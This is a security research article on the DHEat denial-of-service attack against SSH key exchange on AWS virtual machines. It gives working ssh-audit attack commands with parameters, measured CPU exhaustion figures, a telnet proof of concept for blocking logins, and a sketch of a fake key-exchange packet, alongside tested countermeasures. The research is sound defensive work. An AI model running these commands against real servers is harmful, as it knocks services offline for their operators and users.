Positron Security

An Analysis of the DHEat DoS Against SSH in Cloud Environments

April 23, 2024

The DHEat denial-of-service vulnerability involves sending a large number of Diffie-Hellman (DH) public keys to a peer, causing it to perform many unnecessary modular exponentiations and wasting CPU resources (in fact, the attacker can simply send random numbers instead of real DH keys to avoid incurring the computational penalty themselves). Because the DH handshake occurs before authentication in many network protocols (such as SSH), the attack can be conducted anonymously. And interestingly, as the size of the DH modulus increases, the brute-force security of the key exchange also increases, but so does the susceptibility to the DHEat attack since larger (and more expensive) modular exponentiation is required.
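The asymmetry described above can be illustrated with a rough timing sketch in Python. It is not part of ssh-audit: the helper names are hypothetical, the moduli are random odd integers standing in for the real DH group primes, and the exponent is assumed to be as long as the modulus (implementations may use shorter private exponents, so the absolute timings are not representative). Only the trend matters: the victim's cost grows quickly with modulus size, while producing a fake 4-byte "key" costs next to nothing.

```python
import secrets
import time


def random_odd(bits):
    """Random odd integer with exactly `bits` bits (stand-in for a real DH prime)."""
    return secrets.randbits(bits) | (1 << (bits - 1)) | 1


def time_modexp(bits, rounds=3):
    """Average seconds for one 2^y mod p with a `bits`-bit modulus and exponent."""
    p = random_odd(bits)
    y = random_odd(bits)  # assumption: full-length exponent
    start = time.perf_counter()
    for _ in range(rounds):
        pow(2, y, p)
    return (time.perf_counter() - start) / rounds


def time_fake_key(nbytes=4, rounds=3):
    """Average seconds for the attacker to produce a random fake public value."""
    start = time.perf_counter()
    for _ in range(rounds):
        secrets.token_bytes(nbytes)
    return (time.perf_counter() - start) / rounds


if __name__ == "__main__":
    for bits in (2048, 4096, 8192):
        print(f"{bits}-bit modexp: {time_modexp(bits) * 1000:.1f} ms")
    print(f"4-byte fake key: {time_fake_key() * 1000:.4f} ms")
```

On most machines each doubling of the modulus size should make the exponentiation several times slower, which is the effect the attack exploits.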

This attack seems to have first been discussed in a 2002 paper by Raymond and Stiglic [1], but gained renewed attention nearly two decades later in 2021 when Szilárd Pfeiffer released a proof-of-concept tool to attack SSH and HTTPS services [2][3]. This issue was assigned CVE-2002-20001 (note that, despite the name, this CVE was created in 2021).

In this article, I analyze the impact of the DHEat attack against SSH services in cloud environments. Using a custom implementation of the attack (available in ssh-audit v3.2.0), I will show that it can easily consume all CPU resources in Amazon Web Services (AWS) virtual machines running the Amazon Linux 2023 image with default settings when low-latency links exist between a source and target. In fact, only 11 KB/s of bandwidth is needed to exhaust the t3.micro instance, and just 15 KB/s overwhelms the m7i.large instance!

Default OpenSSH Countermeasures

Before getting into the attack results, it is worth explaining the default countermeasures that the OpenSSH implementation includes: the MaxStartups directive. This directive limits the number of pre-authentication connections that OpenSSH will allow before invoking a throttling mechanism. The default value of this directive is “10:30:100”, which means that 10 pre-authentication connections are always allowed. Upon the 11th connection, there is a 30% chance it will be refused. The probability of refusal increases linearly to 100% once 100 connections are reached.
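The throttling curve described above can be written down as a small Python function. This is a sketch of the behaviour as described in this article, not a copy of the OpenSSH source; the function names are hypothetical, and `open_unauth` is assumed to be the number of unauthenticated connections already open when a new one arrives.

```python
def parse_max_startups(value):
    """Split a 'start:rate:full' MaxStartups string into three integers."""
    start, rate, full = (int(part) for part in value.split(":"))
    if not (0 < start <= full and 0 <= rate <= 100):
        raise ValueError(f"invalid MaxStartups value: {value!r}")
    return start, rate, full


def refusal_probability(open_unauth, setting="10:30:100"):
    """Chance (0.0 to 1.0) that the next connection is refused."""
    start, rate, full = parse_max_startups(setting)
    if open_unauth < start:
        return 0.0  # below the threshold, always accepted
    if open_unauth >= full:
        return 1.0  # at or above the hard limit, always refused
    # Linear ramp from `rate` percent at `start` up to 100 percent at `full`.
    return (rate + (100 - rate) * (open_unauth - start) / (full - start)) / 100.0


if __name__ == "__main__":
    for n in (9, 10, 55, 100):
        print(n, refusal_probability(n))
```

With the default setting, this gives no refusals with 9 connections open, 30% with 10 open (the 11th connection), 65% at the midpoint of 55, and 100% at 100.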

During testing it was found that this default can partially protect SSH services in the cloud when the attacker has a relatively high-latency network link to the target (such as conducting the attack from the public Internet with many hops in between). However, this default was found to be fully ineffective when the attacker has a low-latency link (including, but not limited to, using another AWS account as the source). In fact, there was no reasonable MaxStartups setting found that can thwart the DHEat attack in this scenario. An in-depth analysis of this finding can be found in the “DHEat Countermeasures: MaxStartups Tuning” section, later in this article.

Attack Results Against AWS Instances

For all tests below, a fully updated Amazon Linux 2023 image is used with no changes to the defaults (unless otherwise noted).

Target: m7i.large instance + diffie-hellman-group16-sha512 key exchange

Let’s start with the m7i.large instance: a fairly capable general-purpose VM instance whose two vCPUs feature “Up to 3.2 GHz 4th Generation Intel Xeon Scalable processor (Sapphire Rapids 8488C)” (as per AWS’s description). A few minutes after booting the VM, the average idle time over a 60-second period was (unsurprisingly) found to be 99.86%.

Now we’ll run the DHEat attack from the public Internet (over a relatively high-latency link) against the server’s diffie-hellman-group16-sha512 key exchange (which uses a 4096-bit modulus):

$ ssh-audit --dheat=8:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 41; Compl. conns/sec: 41; Bytes sent/sec: 11.2KB; DH kex/sec: 41

The above command makes ssh-audit run 8 concurrent threads and target the diffie-hellman-group16-sha512 key exchange while sending only 4 bytes as its value of e (normally the result of the modular exponentiation g^x mod p, but in this case, just a short random number which tricks the server into thinking a real DH key was sent). In response, the server performs one modular exponentiation (g^y mod p) and returns the result. ssh-audit ignores this, closes the connection, re-opens another, and repeats the process as quickly as possible until manually terminated.
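To make the "4 bytes as its value of e" detail concrete, here is a minimal Python sketch of how such a message could be framed on the wire, following the SSH_MSG_KEXDH_INIT, mpint, and binary packet formats from RFC 4253 and RFC 4251. It is an illustration only and not ssh-audit's code: the function names are hypothetical, and the version exchange, KEXINIT negotiation, and all socket handling are left out.

```python
import os
import struct

SSH_MSG_KEXDH_INIT = 30  # message number defined in RFC 4253


def encode_mpint(raw):
    """Encode unsigned big-endian bytes as an SSH mpint (RFC 4251, section 5)."""
    raw = raw.lstrip(b"\x00")
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw  # leading zero keeps the value positive
    return struct.pack(">I", len(raw)) + raw


def kexdh_init_payload(e_bytes):
    """Message type byte followed by the (possibly fake) public value e."""
    return bytes([SSH_MSG_KEXDH_INIT]) + encode_mpint(e_bytes)


def wrap_binary_packet(payload, block_size=8):
    """Frame a payload as an unencrypted SSH binary packet (RFC 4253, section 6)."""
    # Total length (4-byte length + 1-byte padding length + payload + padding)
    # must be a multiple of the block size, with at least 4 bytes of padding.
    padding_len = block_size - ((5 + len(payload)) % block_size)
    if padding_len < 4:
        padding_len += block_size
    packet_length = 1 + len(payload) + padding_len
    header = struct.pack(">IB", packet_length, padding_len)
    return header + payload + os.urandom(padding_len)


if __name__ == "__main__":
    fake_e = os.urandom(4)  # random bytes instead of a real g^x mod p
    packet = wrap_binary_packet(kexdh_init_payload(fake_e))
    print(len(packet), "bytes on the wire for the fake key exchange message")
```

The point of the sketch is the size difference: a genuine 4096-bit public value would occupy roughly 512 bytes in this message, while the fake one fits in a single 24-byte packet.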

While letting the above command run in the background, we run a custom tool (idle_watcher.py) on the target to collect CPU idle metrics over a trailing 60-second period and compute the average:

$ python3 idle_watcher.py
Running iostat and monitoring CPU idle times for 65 seconds.
Complete!
Average idle time: 64.90%
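For readers who want a comparable measurement without the tool used here, a rough Python equivalent is sketched below. It is not idle_watcher.py: instead of running iostat it is assumed to read the aggregate "cpu" line of /proc/stat on Linux twice and compare the counters, and all function names are hypothetical.

```python
import time


def parse_cpu_line(line):
    """Return (idle, total) jiffies from the aggregate 'cpu' line of /proc/stat."""
    fields = line.split()
    if not fields or fields[0] != "cpu":
        raise ValueError("expected the aggregate 'cpu' line")
    # user, nice, system, idle, iowait, irq, softirq, steal
    values = [int(v) for v in fields[1:9]]
    return values[3], sum(values)


def idle_percent(before, after):
    """Percentage of time spent idle between two 'cpu' line samples."""
    idle_b, total_b = parse_cpu_line(before)
    idle_a, total_a = parse_cpu_line(after)
    elapsed = total_a - total_b
    if elapsed <= 0:
        raise ValueError("samples are not in chronological order")
    return 100.0 * (idle_a - idle_b) / elapsed


def read_cpu_line(path="/proc/stat"):
    """Read the first line of /proc/stat (Linux only)."""
    with open(path) as handle:
        return handle.readline()


def average_idle(seconds=60):
    """Average idle percentage over `seconds` of wall-clock time."""
    before = read_cpu_line()
    time.sleep(seconds)
    return idle_percent(before, read_cpu_line())
```

Calling `average_idle(60)` on the target while the attack runs should give a figure comparable to the idle time reported above, though small differences from iostat's accounting are to be expected.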

Well, our first attempt was rather unimpressive. We were only able to increase CPU load by 99.86% - 64.90% = 34.96%. Let’s see what happens to the 60-second average idle time as we increase the number of threads from 16 to 96 in increments of 16:

$ ssh-audit --dheat=16:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 61; Compl. conns/sec: 51; Bytes sent/sec: 16.7KB; DH kex/sec: 51
---
Average idle time: 52.63%

$ ssh-audit --dheat=32:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 85; Compl. conns/sec: 57; Bytes sent/sec: 23.0KB; DH kex/sec: 57
---
Average idle time: 46.96%

$ ssh-audit --dheat=48:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 97; Compl. conns/sec: 59; Bytes sent/sec: 26.5KB; DH kex/sec: 59
---
Average idle time: 52.02%

$ ssh-audit --dheat=64:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 16884; Compl. conns/sec: 57; Bytes sent/sec: 28.1KB; DH kex/sec: 57
---
Average idle time: 54.48%

$ ssh-audit --dheat=80:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 102; Compl. conns/sec: 51; Bytes sent/sec: 27.7KB; DH kex/sec: 51
---
Average idle time: 58.22%

$ ssh-audit --dheat=96:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 107; Compl. conns/sec: 48; Bytes sent/sec: 29.1KB; DH kex/sec: 48
---
Average idle time: 52.47%

Looks like our best results (46.96% idle) come from using 32 threads and sending 23 KB/s. But what if this strain is the result of accepting 57 connections per second and not because of the modular exponentiation? Using ssh-audit’s --conn-rate-test feature, let’s use 32 threads to create at most 57 connections per second without triggering the exponentiation:

$ ssh-audit --conn-rate-test=32:57 [target]
TCP SYNs/sec: 81.6; Compl. conns/sec: 56.4

After this runs for 60 seconds, idle_watcher.py reports the average idle time as 79.55%. This implies that the new connection handling accounted for 20.31% of CPU load (= 99.86% baseline idle time - 79.55% idle time during connection rate test), and the modular exponentiation resulted in 32.59% CPU load (= 99.86% baseline idle time - 46.96% idle time during the full attack - 20.31% new connection handling load).
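The same bookkeeping is reused for later tests, so it may help to see it as a small Python helper. The function name is hypothetical; the inputs are the three idle-time measurements (baseline, connection-rate test only, and full attack).

```python
def decompose_load(baseline_idle, conn_only_idle, attack_idle):
    """Split attack-induced CPU load into connection handling and modexp shares.

    All arguments and results are percentages of total CPU time.
    """
    conn_load = baseline_idle - conn_only_idle   # cost of accepting connections
    total_load = baseline_idle - attack_idle     # cost of the full attack
    modexp_load = total_load - conn_load         # remainder: modular exponentiation
    return round(conn_load, 2), round(modexp_load, 2)


if __name__ == "__main__":
    # High-latency test against diffie-hellman-group16-sha512 with 32 threads.
    print(decompose_load(99.86, 79.55, 46.96))
```

For the figures above, this yields 20.31% for connection handling and 32.59% for modular exponentiation.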

We did succeed in wasting half of the target’s CPU resources, but fell very much short of overwhelming the server completely. The high communication latency caused sockets to remain in the pool of unauthenticated connections (governed by the MaxStartups directive) for a longer period of time, hence more of our incoming connections were rejected. However, in a lower-latency scenario, each socket would enter and exit the pool faster, allowing a greater number of new connections per second before throttling is triggered.
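One way to reason about this latency effect is Little's law: the average number of connections sitting in the unauthenticated pool is roughly the arrival rate multiplied by the time each connection spends there. The Python sketch below applies that idea. The residence times used in it (250 ms and 5 ms) are purely hypothetical illustrations, not measurements from these tests, and the function names are my own.

```python
def pool_occupancy(conns_per_sec, seconds_in_pool):
    """Average number of unauthenticated connections open at once (Little's law)."""
    return conns_per_sec * seconds_in_pool


def max_unthrottled_rate(start_threshold, seconds_in_pool):
    """Connection rate at which the pool reaches the MaxStartups start value."""
    return start_threshold / seconds_in_pool


if __name__ == "__main__":
    # Hypothetical residence times: 250 ms over the Internet, 5 ms inside a cloud.
    for label, seconds in (("high latency", 0.250), ("low latency", 0.005)):
        rate = max_unthrottled_rate(10, seconds)
        print(f"{label}: about {rate:.0f} conns/sec before throttling starts")
```

Under these assumed numbers, throttling would begin at about 40 connections per second on the slow link but not until about 2000 per second on the fast one, which is consistent with the direction of the results in this article.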

Now let’s see what happens when we run the attack from a very low-latency network source. In this case, we will spin up an m7i.2xlarge AWS instance in another account to use as the attacking source (chosen due to its high network performance), then use the target’s public IPv4 address. This would model a real-world scenario where an attacker is external to the target from both a network and organizational perspective. Through experimentation (omitted for brevity), I found that using only 4 threads results in 0.00% idle time on the target!:

$ ssh-audit --dheat=4:diffie-hellman-group16-sha512:4 [public IPv4 address]
TCP SYNs/sec: 112; Compl. conns/sec: 112; Bytes sent/sec: 30.5KB; DH kex/sec: 112
---
Average idle time: 0.00%

And now, using the same number of threads, let’s see how much idle time results from just creating 112 new connections per second:

$ ssh-audit --conn-rate-test=4:112 [public IPv4 address]
TCP SYNs/sec: 110.7; Compl. conns/sec: 110.7
---
Average idle time: 56.03%

The above results show that 43.83% CPU load was caused by new connection handling, thus 56.03% CPU load was caused by modular exponentiation. These results are quite the improvement over what we got when using a high-latency source (previously, we could only get the average idle time down to 47%; now we’ve gotten it down to 0%!).

Overall, the effect of this DoS attack against a 4096-bit diffie-hellman-group16-sha512 key exchange algorithm is dramatic: with just 31 KB/s of application protocol traffic (not accounting for IP and TCP packet overhead), we’re able to completely exhaust all the vCPUs of a fairly capable cloud VM!

Target: m7i.large instance + diffie-hellman-group18-sha512 key exchange

Now let’s target the diffie-hellman-group18-sha512 key exchange on the same VM. This algorithm features an 8192-bit modulus, which provides greater security against brute force attacks, but causes higher strain when computing modular exponentiation.

From an m7i.2xlarge instance in another AWS account:

$ ssh-audit --dheat=4:diffie-hellman-group18-sha512:4 [public IPv4 address]
TCP SYNs/sec: 55; Compl. conns/sec: 55; Bytes sent/sec: 15.1KB; DH kex/sec: 55
---
Average idle time: 0.01%

Compared to the 4096-bit diffie-hellman-group16-sha512 algorithm, when targeting this 8192-bit diffie-hellman-group18-sha512 algorithm, we’ve effectively consumed both vCPUs with about half of the connections per second (55 vs 112) and half of the bandwidth (15 KB/s vs 31 KB/s)! Impressive.

Target: m7i.large + curve25519-sha256 key exchange

The curve25519-sha256 key exchange was the default in OpenSSH from v6.5 until v8.9. It is a very fast algorithm based on Elliptic Curve Diffie-Hellman combined with the transparently-developed Curve25519 parameters. This, too, can be targeted by the DHEat attack.

From an m7i.2xlarge instance in another AWS account:

$ ssh-audit --dheat=4:curve25519-sha256 [public IPv4 address]
TCP SYNs/sec: 159; Compl. conns/sec: 159; Bytes sent/sec: 45.5KB; DH kex/sec: 159
---
Average idle time: 0.02%

And just to make sure that we didn’t achieve this effect solely from the high rate of connections:

$ ssh-audit --conn-rate-test=4:159 [public IPv4 address]
TCP SYNs/sec: 157.0; Compl. conns/sec: 157.0
---
Average idle time: 49.29%

Targeting curve25519-sha256 requires about 3 times more bandwidth than diffie-hellman-group18-sha512 (46 KB/s vs 15 KB/s), but this is still very reasonable. And it may be possible to further optimize the attack against this key exchange in the future.

Target: m7i.large + sntrup761x25519-sha512@openssh.com key exchange

The relatively new sntrup761x25519-sha512@openssh.com key exchange algorithm is rather interesting, as it wraps the standard X25519 key exchange with the Streamlined NTRU Prime key exchange to provide high resistance to quantum computing attacks. This algorithm became the default in OpenSSH in v9.0 [4], though for some reason it is disabled in the latest revision of Amazon Linux 2023 (as of April 2024). By editing the /etc/crypto-policies/back-ends/opensshserver.config file, this can be turned on to enable testing.

From an m7i.2xlarge instance in another AWS account:

$ ssh-audit --dheat=4:sntrup761x25519-sha512@openssh.com [public IPv4 address]
TCP SYNs/sec: 109; Compl. conns/sec: 109; Bytes sent/sec: 156.5KB; DH kex/sec: 109
---
Average idle time: 0.03%

As you can see, it requires about 10 times higher bandwidth to exhaust the vCPUs in comparison to the diffie-hellman-group18-sha512 key exchange (157 KB/s vs 15 KB/s). Note, however, that ssh-audit’s implementation for this key exchange is very much unoptimized as of this writing; it may be possible to reduce the necessary bandwidth through future improvements.

Target: t3.micro + diffie-hellman-group18-sha512 key exchange

AWS’s t3.micro VM instance is a popular choice for small workloads. As per the AWS documentation, each of its two vCPUs is an “Up to 3.1 GHz Intel Xeon Scalable processor (Skylake 8175M or Cascade Lake 8259CL)”. Since this has more modest resources than the m7i.large instance, we would expect fewer connections per second and less bandwidth to be needed to overwhelm it.

From an m7i.2xlarge instance in another AWS account:

$ ssh-audit --dheat=3:diffie-hellman-group18-sha512:4 [public IPv4 address]
TCP SYNs/sec: 40; Compl. conns/sec: 40; Bytes sent/sec: 10.9KB; DH kex/sec: 40
---
Average idle time: 0.01%

For comparison, the m7i.large instance became flooded at 55 connections per second / 15 KB/s bandwidth against the same key exchange. Hence, the t3.micro instance is roughly 28% easier to overload with respect to bandwidth.
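The 28% figure follows directly from the two measured bandwidths. As a quick check, here is the arithmetic in Python (the function name is hypothetical, and the inputs are the figures reported by ssh-audit above):

```python
def relative_reduction(reference, value):
    """Percentage by which `value` is smaller than `reference`."""
    return (reference - value) / reference * 100.0


if __name__ == "__main__":
    # m7i.large: 15.1 KB/s and 55 conns/sec; t3.micro: 10.9 KB/s and 40 conns/sec.
    print(f"bandwidth:   {relative_reduction(15.1, 10.9):.1f}% less")
    print(f"connections: {relative_reduction(55, 40):.1f}% fewer")
```

Both ratios land near 27 to 28 percent, as expected when the bytes sent per connection stay roughly constant.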

Target: c7a.8xlarge + diffie-hellman-group18-sha512 key exchange

Ok, now here’s where things get interesting. Let’s see what happens when we target a powerful compute-optimized instance: the c7a.8xlarge, which features 32 vCPUs. As per the AWS documentation, it uses “Up to 3.7 GHz 4th generation AMD EPYC processors (AMD EPYC 9R14)”.

From an m7i.2xlarge instance in another AWS account:

$ ssh-audit --dheat=56:diffie-hellman-group18-sha512:4 [public IPv4 address]
TCP SYNs/sec: 3465; Compl. conns/sec: 1151; Bytes sent/sec: 937.5KB; DH kex/sec: 1150
---
Average idle time: 0.92%

Let’s see how much load we add just from the new connections:

$ ssh-audit --conn-rate-test=56:1151 [public IPv4 address]
TCP SYNs/sec: 2105.8; Compl. conns/sec: 1134.4
---
Average idle time: 74.81%

Amazing! We caused over 99% load across 32 high-performance vCPUs! Of this, roughly 74% was the result of superfluous modular exponentiation, with the remaining 25% load coming from new connection handling. And all that with under 1MB/s of network traffic!

DHEat Countermeasures: MaxStartups Tuning

As witnessed above, OpenSSH’s default MaxStartups setting (“10:30:100”) is only effective when a relatively high-latency connection is used. When we used a low-latency link (a VM instance in another AWS account), we were easily able to bypass this default. Let’s now take a look at the effects of strengthening the setting to see if low-latency connections can still flood the target.

As we saw before, the m7i.large instance becomes flooded when it receives 55 connections per second / 15 KB/s directed at the diffie-hellman-group18-sha512 key exchange from a low-latency source with the default MaxStartups setting. Let’s update the setting to “10:30:20”, which would cause between 30% and 100% connection drops when 11 to 20 pre-authentication connections are formed:

$ ssh-audit --dheat=4:diffie-hellman-group18-sha512:4 [public IPv4 address]
TCP SYNs/sec: 54; Compl. conns/sec: 54; Bytes sent/sec: 14.7KB; DH kex/sec: 54
---
Average idle time: 0.00%

Completely ineffective. Ok, let’s try “10:100:10”; this would block all connections once 10 is reached:

[command remains constant for all tests and will be omitted]
TCP SYNs/sec: 54; Compl. conns/sec: 54; Bytes sent/sec: 14.8KB; DH kex/sec: 54
---
Average idle time: 0.01%

Another failure. How about “5:100:5”?:

TCP SYNs/sec: 161; Compl. conns/sec: 53; Bytes sent/sec: 43.6KB; DH kex/sec: 53
---
Average idle time: 0.00%

Wow! I expected to at least begin to see the effects of the tighter restriction. But nothing changed! Ok, let’s reject all incoming requests after just 2 unauthenticated sockets are opened (“2:100:2”):

TCP SYNs/sec: 5322; Compl. conns/sec: 31; Bytes sent/sec: 1.4MB; DH kex/sec: 31
---
Average idle time: 39.61%

Ok, we finally see an effect. But this is bad news: not only did we need to reduce the number of allowed pre-authentication connections down to an unreasonable size, but we were still able to eat 60% of the CPU regardless!

Continuing down this path is all but pointless from a practical perspective, but just for completeness, let’s try the absolutely most restrictive setting possible (“1:100:1”):

TCP SYNs/sec: 7262; Compl. conns/sec: 0; Bytes sent/sec: 1.9MB; DH kex/sec: 0
---
Average idle time: 87.90%

Now it’s official: the MaxStartups setting cannot be reasonably used to prevent a denial-of-service condition. When the extreme “1:100:1” setting is used, the DHEat attack is prevented, but another trivial DoS attack becomes possible: an attacker can simply open one (1) connection with the server and leave it idle to prevent ALL new logins. Proof-of-concept:

$ telnet target-host 22 # Attacker creates one connection, then lets it idle.
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
SSH-2.0-OpenSSH_8.7

$ telnet target-host 22 # A new legitimate connection is attempted...
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
Exceeded MaxStartups
Connection closed by foreign host.

There is, however, one last configuration change we can try with OpenSSH: the PerSourceMaxStartups setting. This option was added in OpenSSH v8.5 (released in March 2021)[5], and further restricts pre-authentication connections coming from a particular source (vs. MaxStartups, which defines a global limit).

Let’s reset MaxStartups to the default, then set PerSourceMaxStartups to 2. This would allow up to 2 pre-authentication connections at a time from any one source IP:

TCP SYNs/sec: 1841; Compl. conns/sec: 41; Bytes sent/sec: 498.2KB; DH kex/sec: 41
---
Average idle time: 46.22%

Well, that’s a partial fix. We’re still able to consume more than 50% of the vCPUs, though.

Lastly, let’s see what happens when we set PerSourceMaxStartups to 1:

TCP SYNs/sec: 2469; Compl. conns/sec: 0; Bytes sent/sec: 668.0KB; DH kex/sec: 0
---
Average idle time: 96.05%

That’s a great result! The only downside is that in use cases involving a burst of new connections from a single source, some of those connections would be improperly rejected. In fact, performing a standard audit with ssh-audit results in failures in the group key exchange enumeration phase, yielding incomplete findings.

DHEat Countermeasures: TCP Connection Throttling

Another viable countermeasure to the attack would be TCP connection throttling at the kernel level. The following Linux commands will restrict incoming SSH connections to at most 10 connections every 10 seconds per IPv4/IPv6 source address:

# iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --set
# iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 10 --hitcount 10 -j DROP

# ip6tables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --set
# ip6tables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 10 --hitcount 10 -j DROP

This can very effectively neutralize the attack, while still allowing bursts of legitimate connections. Observe the result on an m7i.large instance with this rate limiting in place:

$ ssh-audit --dheat=4:diffie-hellman-group18-sha512:4 [public IPv4 address]
TCP SYNs/sec: 51; Compl. conns/sec: 0; Bytes sent/sec: 60 bytes; DH kex/sec: 0
---
Average idle time: 98.96%

Success!
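To see why the rate-limiting rules still leave room for legitimate bursts, their behaviour can be approximated with a small per-source sliding window in Python. This is a simplified model rather than the kernel's actual logic: the class name is hypothetical, every attempt (accepted or dropped) is assumed to be recorded as a hit, and limits on how many timestamps the kernel remembers per address are ignored.

```python
from collections import defaultdict, deque


class RecentLimiter:
    """Simplified per-source model: drop once `hitcount` hits fall within `seconds`."""

    def __init__(self, seconds=10, hitcount=10):
        self.seconds = seconds
        self.hitcount = hitcount
        self.stamps = defaultdict(deque)  # source address -> recent hit times

    def allow(self, source, now):
        """Return True if a new connection from `source` at time `now` is accepted."""
        stamps = self.stamps[source]
        # Forget hits that have aged out of the window.
        while stamps and stamps[0] <= now - self.seconds:
            stamps.popleft()
        allowed = len(stamps) < self.hitcount
        stamps.append(now)  # assumption: dropped attempts also count as hits
        return allowed


if __name__ == "__main__":
    limiter = RecentLimiter()
    # An attacker opening 50 connections per second from one (example) address.
    accepted = sum(limiter.allow("198.51.100.7", i / 50) for i in range(500))
    print(f"{accepted} of 500 connection attempts accepted in 10 seconds")
```

In this model a single source gets its first 10 connections through and is then blocked for as long as it keeps trying, while other sources are unaffected.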

Conclusion

The DHEat attack remains viable against most SSH installations, as default settings are inadequate at deflecting it. Very little bandwidth is needed to cause a dramatic effect on targets, including those with a high degree of resources. Hence, SSH services should be blocked from external access whenever possible. Furthermore, connection rate limiting should always be applied regardless of network segmentation, as per the central principles of Zero Trust.

There are two options for implementing this rate limiting:

Setting the OpenSSH PerSourceMaxStartups directive to 1 will provide full protection, but may result in some client failures if a burst of new connections is made (this has been observed to happen when conducting a standard audit with ssh-audit).
Using iptables/ip6tables at the kernel-level also provides full protection, while still being flexible enough to allow bursts of new connections.

References

[1] Raymond, Jean-Francois and Stiglic, Anton, “Security Issues in the Diffie-Hellman Key Agreement Protocol”, IEEE Transactions on Information Theory 22, pg. 12, 2002, <https://www.researchgate.net/publication/2401745_Security_Issues_in_the_Diffie-Hellman_Key_Agreement_Protocol>.
[2] https://gitlab.com/dheatattack/dheater
[3] https://www.reddit.com/r/netsec/comments/qdoosy/server_overload_by_enforcing_dhe_key_exchange/
[4] https://www.openssh.com/txt/release-9.0
[5] https://www.openssh.com/txt/release-8.5
